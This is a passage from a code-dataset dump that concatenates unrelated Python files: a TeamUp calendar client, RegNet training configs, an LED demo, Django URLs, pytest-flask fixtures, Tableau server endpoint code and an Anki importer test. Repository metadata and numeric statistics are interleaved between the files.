self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
OverlayUFOs() | 39.118943 | 182 | 0.575526 | 25,360 | 0.95188 | 0 | 0 | 114 | 0.004279 | 0 | 0 | 7,435 | 0.279071 |
c7ba815c300287faa117210ec887325390625523 | 114 | py | Python | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 25 | 2020-03-20T05:02:09.000Z | 2022-03-29T13:24:36.000Z | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 7 | 2020-01-22T23:10:25.000Z | 2021-06-02T21:41:27.000Z | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 14 | 2020-03-20T05:02:18.000Z | 2022-03-29T13:24:39.000Z | import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True)
| 16.285714 | 59 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.210526 |
c7bb3480194f9fe2fbc061710221cb965aa24166 | 9,368 | py | Python | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 5 | 2019-04-11T14:52:19.000Z | 2022-03-13T10:39:22.000Z | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 9 | 2019-04-11T14:49:59.000Z | 2021-11-30T08:34:31.000Z | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 3 | 2019-04-11T14:17:00.000Z | 2021-07-15T06:59:13.000Z | import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
else:
return None
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown == True:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='event'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `event` `series` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas paramter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
dict = {'remote_id': remote_id,
'title': title,
'subcalendar_ids': subcalendar_ids,
'start_dt': format_date(start_dt),
'end_dt': format_date(end_dt),
'all_day': all_day,
'notes': notes,
'location': location,
'who': who
}
resp_text = self._create_event_from_json(json.dumps(dict))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
| 39.694915 | 144 | 0.627242 | 9,102 | 0.971605 | 0 | 0 | 1,261 | 0.134607 | 0 | 0 | 2,897 | 0.309244 |
c7bd4060064aa4ccc776c07aa7678497ec65e795 | 8,232 | py | Python | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| 2 | 2021-11-05T13:09:12.000Z | 2022-03-04T05:07:33.000Z | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| 1 | 2021-11-04T10:06:57.000Z | 2021-11-07T08:35:39.000Z | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| null | null | null |
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
| 68.6 | 153 | 0.409621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,627 | 0.319121 |
c7bde259829ba295ad5078b7f30b72f3fddb4e13 | 1,608 | py | Python | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 69 | 2016-09-04T18:36:18.000Z | 2021-07-04T21:51:54.000Z | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 42 | 2016-09-02T20:10:19.000Z | 2020-07-01T05:54:01.000Z | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 11 | 2016-09-29T14:33:23.000Z | 2021-02-28T19:30:49.000Z | #
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, Erik Moqvist
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
| 29.236364 | 69 | 0.735075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,234 | 0.767413 |
c7be4754a949474c9764e2ad170025656a516b5f | 740 | py | Python | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| 9 | 2016-02-16T23:53:40.000Z | 2020-07-13T16:04:18.000Z | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| null | null | null | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| 4 | 2016-02-16T23:56:13.000Z | 2019-05-20T15:12:14.000Z | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibilty with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | 41.111111 | 81 | 0.554054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 496 | 0.67027 |
c7be660a1e99ce3791843752d3993ac9fa123bdb | 5,812 | py | Python | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| null | null | null | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| 1 | 2019-08-20T18:42:14.000Z | 2019-08-20T18:42:14.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| 1 | 2019-08-20T18:11:48.000Z | 2019-08-20T18:11:48.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('[email protected]', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| 28.213592 | 89 | 0.635754 | 2,223 | 0.382485 | 176 | 0.030282 | 2,889 | 0.497075 | 0 | 0 | 2,374 | 0.408465 |
c7be8fc77e58c39c645eb0be54b3d89d725dc934 | 7,700 | py | Python | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| 1 | 2021-12-22T21:34:17.000Z | 2021-12-22T21:34:17.000Z | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| null | null | null | tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | fefd6f18d8a6617829c6323879d2c3ed77a4cda6 | [
"CC0-1.0",
"MIT"
]
| null | null | null | from .exceptions import (
ServerResponseError,
InternalServerError,
NonXMLResponseError,
EndpointUnavailableError,
)
from functools import wraps
from xml.etree.ElementTree import ParseError
from ..query import QuerySet
import logging
try:
from distutils2.version import NormalizedVersion as Version
except ImportError:
from distutils.version import LooseVersion as Version
logger = logging.getLogger("tableau.endpoint")
Success_codes = [200, 201, 202, 204]
class Endpoint(object):
def __init__(self, parent_srv):
self.parent_srv = parent_srv
@staticmethod
def _make_common_headers(auth_token, content_type):
headers = {}
if auth_token is not None:
headers["x-tableau-auth"] = auth_token
if content_type is not None:
headers["content-type"] = content_type
return headers
@staticmethod
def _safe_to_log(server_response):
"""Checks if the server_response content is not xml (eg binary image or zip)
and replaces it with a constant
"""
ALLOWED_CONTENT_TYPES = ("application/xml", "application/xml;charset=utf-8")
if server_response.headers.get("Content-Type", None) not in ALLOWED_CONTENT_TYPES:
return "[Truncated File Contents]"
else:
return server_response.content
def _make_request(
self,
method,
url,
content=None,
auth_token=None,
content_type=None,
parameters=None,
):
parameters = parameters or {}
parameters.update(self.parent_srv.http_options)
parameters["headers"] = Endpoint._make_common_headers(auth_token, content_type)
if content is not None:
parameters["data"] = content
logger.debug(u"request {}, url: {}".format(method.__name__, url))
if content:
logger.debug(u"request content: {}".format(content[:1000]))
server_response = method(url, **parameters)
self.parent_srv._namespace.detect(server_response.content)
self._check_status(server_response)
# This check is to determine if the response is a text response (xml or otherwise)
# so that we do not attempt to log bytes and other binary data.
if len(server_response.content) > 0 and server_response.encoding:
logger.debug(
u"Server response from {0}:\n\t{1}".format(
url, server_response.content.decode(server_response.encoding)
)
)
return server_response
def _check_status(self, server_response):
if server_response.status_code >= 500:
raise InternalServerError(server_response)
elif server_response.status_code not in Success_codes:
try:
raise ServerResponseError.from_response(server_response.content, self.parent_srv.namespace)
except ParseError:
# This will happen if we get a non-success HTTP code that
# doesn't return an xml error object (like metadata endpoints)
# we convert this to a better exception and pass through the raw
# response body
raise NonXMLResponseError(server_response.content)
except Exception:
# anything else re-raise here
raise
def get_unauthenticated_request(self, url):
return self._make_request(self.parent_srv.session.get, url)
def get_request(self, url, request_object=None, parameters=None):
if request_object is not None:
try:
# Query param delimiters don't need to be encoded for versions before 3.7 (2020.1)
self.parent_srv.assert_at_least_version("3.7")
parameters = parameters or {}
parameters["params"] = request_object.get_query_params()
except EndpointUnavailableError:
url = request_object.apply_query_params(url)
return self._make_request(
self.parent_srv.session.get,
url,
auth_token=self.parent_srv.auth_token,
parameters=parameters,
)
def delete_request(self, url):
# We don't return anything for a delete
self._make_request(self.parent_srv.session.delete, url, auth_token=self.parent_srv.auth_token)
def put_request(self, url, xml_request=None, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.put,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def post_request(self, url, xml_request, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.post,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def api(version):
"""Annotate the minimum supported version for an endpoint.
Checks the version on the server object and compares normalized versions.
It will raise an exception if the server version is > the version specified.
Args:
`version` minimum version that supports the endpoint. String.
Raises:
EndpointUnavailableError
Returns:
None
Example:
>>> @api(version="2.3")
>>> def get(self, req_options=None):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.parent_srv.assert_at_least_version(version)
return func(self, *args, **kwargs)
return wrapper
return _decorator
def parameter_added_in(**params):
"""Annotate minimum versions for new parameters or request options on an endpoint.
The api decorator documents when an endpoint was added, this decorator annotates
keyword arguments on endpoints that may control functionality added after an endpoint was introduced.
The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing
an exception.
Args:
Key/value pairs of the form `parameter`=`version`. Kwargs.
Raises:
UserWarning
Returns:
None
Example:
>>> @api(version="2.0")
>>> @parameter_added_in(no_extract='2.5')
>>> def download(self, workbook_id, filepath=None, extract_only=False):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
import warnings
server_ver = Version(self.parent_srv.version or "0.0")
params_to_check = set(params) & set(kwargs)
for p in params_to_check:
min_ver = Version(str(params[p]))
if server_ver < min_ver:
error = "{!r} not available in {}, it will be ignored. Added in {}".format(p, server_ver, min_ver)
warnings.warn(error)
return func(self, *args, **kwargs)
return wrapper
return _decorator
class QuerysetEndpoint(Endpoint):
@api(version="2.0")
def all(self, *args, **kwargs):
queryset = QuerySet(self)
return queryset
@api(version="2.0")
def filter(self, *args, **kwargs):
queryset = QuerySet(self).filter(**kwargs)
return queryset
@api(version="2.0")
def order_by(self, *args, **kwargs):
queryset = QuerySet(self).order_by(*args)
return queryset
@api(version="2.0")
def paginate(self, **kwargs):
queryset = QuerySet(self).paginate(**kwargs)
return queryset
| 33.189655 | 118 | 0.632597 | 5,068 | 0.658182 | 0 | 0 | 1,975 | 0.256494 | 0 | 0 | 2,171 | 0.281948 |
c7c0ec1f2d22d969372f765fb0d7aef4a98be04f | 4,617 | py | Python | spec/test_importer.py | lajohnston/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| 15 | 2016-10-06T00:27:26.000Z | 2022-03-04T04:24:50.000Z | spec/test_importer.py | eljay26/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| null | null | null | spec/test_importer.py | eljay26/anki-freeplane | 746e3dd714653df428f0541609b9c51e29cd2726 | [
"MIT"
]
| 6 | 2016-11-08T06:55:47.000Z | 2021-03-24T22:15:14.000Z | import unittest
from freeplane_importer.importer import Importer
from mock import Mock
from mock import MagicMock
from mock import call
from freeplane_importer.model_not_found_exception import ModelNotFoundException
class TestImporter(unittest.TestCase):
def setUp(self):
self.mock_collection = Mock()
self.mock_model = MagicMock()
self.mock_collection.models.byName.return_value = self.mock_model
self.mock_note = MagicMock()
self.mock_note.model.return_value = self.mock_model
self.mock_collection.newNote.return_value = self.mock_note
self.mock_collection.models.fieldNames.return_value = []
self.importer = Importer(self.mock_collection)
self.mock_collection.db.scalar.return_value = None
self.note = {
'id': 100,
'deck': 'History',
'model': 'Basic',
'fields': {}
}
def test_it_should_initialise_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.setCurrent.assert_called_with(
self.mock_model)
def test_it_should_select_the_correct_deck(self):
self.mock_collection.decks.id.return_value = 100
self.importer = Importer(self.mock_collection)
self.importer.import_note(self.note)
self.mock_model.__setitem__.assert_called_with('did', 100)
self.mock_collection.decks.id.assert_called_with('History')
def test_it_should_find_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.byName.assert_called_with('Basic')
def test_it_should_return_true_if_note_was_added_successfully(self):
self.assertTrue(self.importer.import_note(self.note))
def test_it_should_raise_a_no_model_exception_if_the_model_does_not_exist(self):
self.mock_collection.models.byName.return_value = None
self.assertRaises(ModelNotFoundException,
self.importer.import_note, self.note)
